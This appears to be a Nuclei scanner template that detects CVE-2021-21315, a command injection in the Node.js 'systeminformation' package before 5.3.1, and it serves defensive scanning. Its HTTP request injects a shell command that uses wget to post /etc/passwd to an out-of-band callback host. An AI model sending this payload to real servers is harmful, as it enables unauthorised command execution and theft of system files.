id: CVE-2021-21315 info: name: Node.JS System Information Library <5.3.1 - Remote Command Injection author: pikpikcu severity: high description: Node.JS System Information Library System before version 5.3.1 is susceptible to remote command injection. Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system and OS information. remediation: Upgrade to version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected reference: - https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC - https://security.netapp.com/advisory/ntap-20210312-0007/ - https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-2m8v-572m-ff2v - https://www.npmjs.com/package/systeminformation - https://nvd.nist.gov/vuln/detail/CVE-2021-21315 classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2021-21315 cwe-id: CWE-78 epss-score: 0.96899 epss-percentile: 0.99614 cpe: cpe:2.3:a:systeminformation:systeminformation:*:*:*:*:*:node.js:*:* metadata: max-request: 1 vendor: systeminformation product: systeminformation framework: node.js tags: nodejs,cve,cve2021,kev http: - method: GET path: - "{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20{{interactsh-url}})" matchers-condition: and matchers: - type: word part: body words: - "wget --post-file /etc/passwd {{interactsh-url}}" - name - running - pids condition: and - type: word part: header words: - "application/json" - type: status status: - 200 # digest: 4a0a0047304502210084a171155b63a6323362257bc680eacc13f3f0d32b01542272fa2e40e772a31c022045181f5d2eb56bd8ab057c0597cc665a2d8d339b07af0520e441ea0dc564c9ea:922c64590222798bb761d5b6d8e72950